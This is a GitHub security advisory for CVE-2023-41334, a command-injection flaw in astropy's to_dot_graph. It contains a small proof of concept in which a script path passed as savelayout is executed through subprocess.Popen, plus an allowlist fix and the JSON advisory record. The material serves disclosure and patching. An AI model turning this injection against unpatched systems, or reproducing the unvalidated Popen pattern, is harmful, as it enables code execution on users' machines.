ghsa-h2x6-5jx5-46hf
Vulnerability from github
Published: 2024-03-18 20:26
Modified: 2024-03-18 21:46
Summary: RCE in TransformGraph().to_dot_graph function
Details

Summary

RCE due to improper input validation in the TransformGraph().to_dot_graph function

Details

Due to improper input validation, a malicious user can provide a command or a script file as the value of the savelayout argument, which is then placed as the first element of the argument list passed to subprocess.Popen (see https://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539). Although an error will be raised, the command or script will still be executed successfully.

PoC

```shell
$ cat /tmp/script
#!/bin/bash
echo astrorce > /tmp/poc.txt
```
```shell
$ python3
Python 3.9.2 (default, Feb 28 2021, 17:03:44)
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from astropy.coordinates.transformations import TransformGraph
>>> tg = TransformGraph()
>>> tg.to_dot_graph(savefn="/tmp/1.txt", savelayout="/tmp/script")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/u32i/.local/lib/python3.9/site-packages/astropy/coordinates/transformations.py", line 584, in to_dot_graph
    stdout, stderr = proc.communicate(dotgraph)
  File "/usr/lib/python3.9/subprocess.py", line 1134, in communicate
    stdout, stderr = self._communicate(input, endtime, timeout)
  File "/usr/lib/python3.9/subprocess.py", line 1961, in _communicate
    input_view = memoryview(self._input)
TypeError: memoryview: a bytes-like object is required, not 'str'
>>>
```
```shell
$ cat /tmp/poc.txt
astrorce
```

Impact

Code execution on the user's machine.
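The root cause above is a caller-controlled string becoming argv[0] of subprocess.Popen, with the TypeError arriving only after the child has been spawned. The following is an added example of the allowlist gate that closes this pattern; it is not astropy's code, and the Graphviz engine list, output-format list and helper names are assumptions chosen for illustration:

```python
"""Allowlist-gate a user-supplied layout program before it can become argv[0]."""
import shutil
import subprocess

# Assumed allowlist of Graphviz layout engines (not astropy's list); trim to what you ship.
GRAPHVIZ_LAYOUTS = frozenset(
    {"dot", "neato", "twopi", "circo", "fdp", "sfdp", "osage", "patchwork"}
)
OUTPUT_FORMATS = frozenset({"png", "svg", "pdf", "ps", "dot"})  # assumed as well


def validate_layout(savelayout: object) -> str:
    """Return savelayout only if it is exactly one of the allowlisted bare names.

    Exact-match against a frozenset rejects paths ("/tmp/script", "../dot"),
    extra arguments, and anything else a caller could smuggle in as argv[0].
    """
    if not isinstance(savelayout, str) or savelayout not in GRAPHVIZ_LAYOUTS:
        raise ValueError(
            f"savelayout must be one of {sorted(GRAPHVIZ_LAYOUTS)}, got {savelayout!r}"
        )
    return savelayout


def build_dot_command(savelayout: str, fmt: str) -> list:
    """Build the argv list for the layout subprocess; both elements are allowlisted."""
    if fmt not in OUTPUT_FORMATS:
        raise ValueError(f"unsupported output format {fmt!r}")
    return [validate_layout(savelayout), f"-T{fmt}"]


def render_dot(dotgraph: str, savefn: str, savelayout: str = "dot") -> bytes:
    """Run the allowlisted layout program on DOT source and return the rendered bytes.

    Validate before Popen: Popen spawns the child at construction, so a later
    failure (like the str/bytes TypeError in the advisory traceback) comes too
    late to stop an argv[0] that is already running. Encoding the DOT source to
    bytes gives communicate() the type it expects.
    """
    argv = build_dot_command(savelayout, savefn.rsplit(".", 1)[-1].lower())
    if shutil.which(argv[0]) is None:
        raise FileNotFoundError(f"{argv[0]} not found on PATH")
    proc = subprocess.Popen(
        argv, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE
    )
    out, err = proc.communicate(dotgraph.encode("utf-8"))
    if proc.returncode != 0:
        raise RuntimeError(err.decode("utf-8", "replace"))
    return out
```

Only validate_layout and build_dot_command need to run to exercise the check; render_dot additionally requires a Graphviz binary on PATH.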



{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "astropy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.3.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-41334"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74",
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-18T20:26:33Z",
    "nvd_published_at": "2024-03-18T19:15:05Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nRCE due to improper input validation in TranformGraph().to_dot_graph function\n\n### Details\n\nDue to improper input validation a malicious user can provide a command or a script file as a value to `savelayout` argument, which will be placed as the first value in a list of arguments passed to `subprocess.Popen`. \nhttps://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539\nAlthough an error will be raised, the command or script will be executed successfully.\n\n### PoC\n\n```shell\n$ cat /tmp/script\n#!/bin/bash\necho astrorce \u003e /tmp/poc.txt\n```\n```shell\n$ python3\nPython 3.9.2 (default, Feb 28 2021, 17:03:44) \n[GCC 10.2.1 20210110] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n\u003e\u003e\u003e from astropy.coordinates.transformations import TransformGraph\n\u003e\u003e\u003e tg = TransformGraph()\n\u003e\u003e\u003e tg.to_dot_graph(savefn=\"/tmp/1.txt\", savelayout=\"/tmp/script\")\nTraceback (most recent call last):\n  File \"\u003cstdin\u003e\", line 1, in \u003cmodule\u003e\n  File \"/home/u32i/.local/lib/python3.9/site-packages/astropy/coordinates/transformations.py\", line 584, in to_dot_graph\n    stdout, stderr = proc.communicate(dotgraph)\n  File \"/usr/lib/python3.9/subprocess.py\", line 1134, in communicate\n    stdout, stderr = self._communicate(input, endtime, timeout)\n  File \"/usr/lib/python3.9/subprocess.py\", line 1961, in _communicate\n    input_view = memoryview(self._input)\nTypeError: memoryview: a bytes-like object is required, not \u0027str\u0027\n\u003e\u003e\u003e \n```\n```shell\n$ cat /tmp/poc.txt\nastrorce\n```\n\n### Impact\ncode execution on the user\u0027s machine\n",
  "id": "GHSA-h2x6-5jx5-46hf",
  "modified": "2024-03-18T21:46:18Z",
  "published": "2024-03-18T20:26:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/astropy/astropy/security/advisories/GHSA-h2x6-5jx5-46hf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41334"
    },
    {
      "type": "WEB",
      "url": "https://github.com/astropy/astropy/commit/22057d37b1313f5f5a9b5783df0a091d978dccb5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/astropy/astropy"
    },
    {
      "type": "WEB",
      "url": "https://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "RCE in TranformGraph().to_dot_graph function"
}

